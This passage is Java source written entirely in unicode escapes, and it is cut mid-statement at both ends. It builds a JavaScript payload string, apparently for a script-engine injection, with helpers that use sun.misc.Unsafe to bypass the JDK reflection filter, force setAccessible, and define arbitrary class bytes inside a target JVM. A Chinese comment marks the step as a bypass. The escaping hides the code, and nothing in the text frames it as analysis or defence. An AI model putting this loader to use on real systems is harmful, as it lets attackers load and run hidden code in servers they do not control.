\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u0061\u0074\u0061\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u0063\u006c\u0061\u007a\u007a\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u0061\u0074\u0061\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0063\u006c\u0061\u007a\u007a\u002c\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u006f\u0062\u006a\u0065\u0063\u0074\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u0061\u0074\u0061\u0046\u0069\u0065\u006c\u0064\u0029\u002c\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0062\u0079\u0070\u0061\u0073\u0073\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0046\u0069\u006c\u0074\u0065\u0072\u0028\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0072\u0079\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0064\u006b\u002e\u0069\u006e\u0074\u0065\u0072\u006e\u0061\u006c\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u0065\u0072\u0072\u006f\u0072\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u0073\u0075\u006e\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u0061\u0073\u0073\u0042\u0075\u0066\u0066\u0065\u0072\u0020\u003d\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0052\u0065\u0073\u006f\u0075\u0072\u0063\u0065\u0041\u0073\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u005c\u0022\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u002e\u0063\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u002e\u0072\u0065\u0061\u0064\u0041\u006c\u006c\u0042\u0079\u0074\u0065\u0073\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0064\u0065\u0066\u0069\u006e\u0065\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002c\u0020\u0063\u006c\u0061\u0073\u0073\u0042\u0075\u0066\u0066\u0065\u0072\u002c\u0020\u006e\u0075\u006c\u006c\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0041\u006e\u006f\u006e\u0079\u006d\u006f\u0075\u0073\u0043\u006c\u0061\u0073\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u002e\u0067\u0065\u0074\u0054\u0079\u0070\u0065\u0028\u0029\u002e\u0069\u0073\u0041\u0073\u0073\u0069\u0067\u006e\u0061\u0062\u006c\u0065\u0046\u0072\u006f\u006d\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u0029\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002c\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0073\u0074\u0061\u0074\u0069\u0063\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u0066\u0069\u0065\u006c\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0029\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0043\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072\u0028\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u002e\u0067\u0065\u0074\u0054\u0079\u0070\u0065\u0028\u0029\u002e\u0069\u0073\u0041\u0073\u0073\u0069\u0067\u006e\u0061\u0062\u006c\u0065\u0046\u0072\u006f\u006d\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u0029\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0043\u006c\u0061\u0073\u0073\u002c\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0073\u0074\u0061\u0074\u0069\u0063\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u006d\u0065\u0074\u0068\u006f\u0064\u0046\u0069\u006c\u0074\u0065\u0072\u004d\u0061\u0070\u0046\u0069\u0065\u006c\u0064\u0029\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0048\u0061\u0073\u0068\u004d\u0061\u0070\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0043\u006f\u006e\u0073\u0074\u0072\u0075\u0063\u0074\u006f\u0072\u0028\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0072\u0065\u006d\u006f\u0076\u0065\u0043\u006c\u0061\u0073\u0073\u0043\u0061\u0063\u0068\u0065\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u005c\u0022\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0061\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u006f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0046\u0069\u0065\u006c\u0064\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u005c\u0022\u006f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u006f\u0066\u0066\u0073\u0065\u0074\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u006f\u0062\u006a\u0065\u0063\u0074\u0046\u0069\u0065\u006c\u0064\u004f\u0066\u0066\u0073\u0065\u0074\u0028\u006f\u0076\u0065\u0072\u0072\u0069\u0064\u0065\u0046\u0069\u0065\u006c\u0064\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0070\u0075\u0074\u0042\u006f\u006f\u006c\u0065\u0061\u006e\u0028\u0061\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u004f\u0062\u006a\u0065\u0063\u0074\u002c\u0020\u006f\u0066\u0066\u0073\u0065\u0074\u002c\u0020\u0074\u0072\u0075\u0065\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u0062\u0079\u0074\u0065\u0073\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u007a\u0020\u003d\u0020\u006e\u0075\u006c\u006c\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0076\u0065\u0072\u0073\u0069\u006f\u006e\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0076\u0065\u0072\u0073\u0069\u006f\u006e\u005c\u0022\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u0020\u003d\u0020\u0067\u0065\u0074\u0055\u006e\u0073\u0061\u0066\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u006e\u0065\u0074\u002e\u0055\u0052\u004c\u0043\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0041\u0072\u0072\u0061\u0079\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0065\u0074\u002e\u0055\u0052\u004c\u005c\u0022\u0029\u002c\u0020\u0030\u0029\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0072\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0069\u0066\u0020\u0028\u0076\u0065\u0072\u0073\u0069\u006f\u006e\u002e\u0073\u0070\u006c\u0069\u0074\u0028\u005c\u0022\u002e\u005c\u0022\u0029\u005b\u0030\u005d\u0020\u003e\u003d\u0020\u0031\u0031\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0062\u0079\u0070\u0061\u0073\u0073\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0046\u0069\u006c\u0074\u0065\u0072\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u004d\u0065\u0074\u0068\u006f\u0064\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u005c\u0022\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u005c\u0022\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u005b\u0042\u005c\u0022\u0029\u002c\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u002e\u0054\u0059\u0050\u0045\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u002e\u0054\u0059\u0050\u0045\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u004d\u0065\u0074\u0068\u006f\u0064\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u002f\u002f\u0020\u7ed5\u8fc7\u0020\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0020\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0063\u006c\u007a\u0020\u003d\u0020\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u004d\u0065\u0074\u0068\u006f\u0064\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u002c\u0020\u0030\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u007d\u0065\u006c\u0073\u0065\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0070\u0072\u006f\u0074\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u006f\u006d\u0061\u0069\u006e\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0073\u0065\u0063\u0075\u0072\u0069\u0074\u0079\u002e\u0050\u0072\u006f\u0074\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u006f\u006d\u0061\u0069\u006e\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0073\u0065\u0063\u0075\u0072\u0069\u0074\u0079\u002e\u0043\u006f\u0064\u0065\u0053\u006f\u0075\u0072\u0063\u0065\u0028\u006e\u0075\u006c\u006c\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0041\u0072\u0072\u0061\u0079\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0073\u0065\u0063\u0075\u0072\u0069\u0074\u0079\u002e\u0063\u0065\u0072\u0074\u002e\u0043\u0065\u0072\u0074\u0069\u0066\u0069\u0063\u0061\u0074\u0065\u005c\u0022\u0029\u002c\u0020\u0030\u0029\u0029\u002c\u0020\u006e\u0075\u006c\u006c\u002c\u0020\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u002c\u0020\u005b\u005d\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0063\u006c\u007a\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u006e\u0075\u006c\u006c\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u002c\u0020\u0030\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u002c\u0020\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u002c\u0020\u0070\u0072\u006f\u0074\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u006f\u006d\u0061\u0069\u006e\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0063\u0061\u0074\u0063\u0068\u0028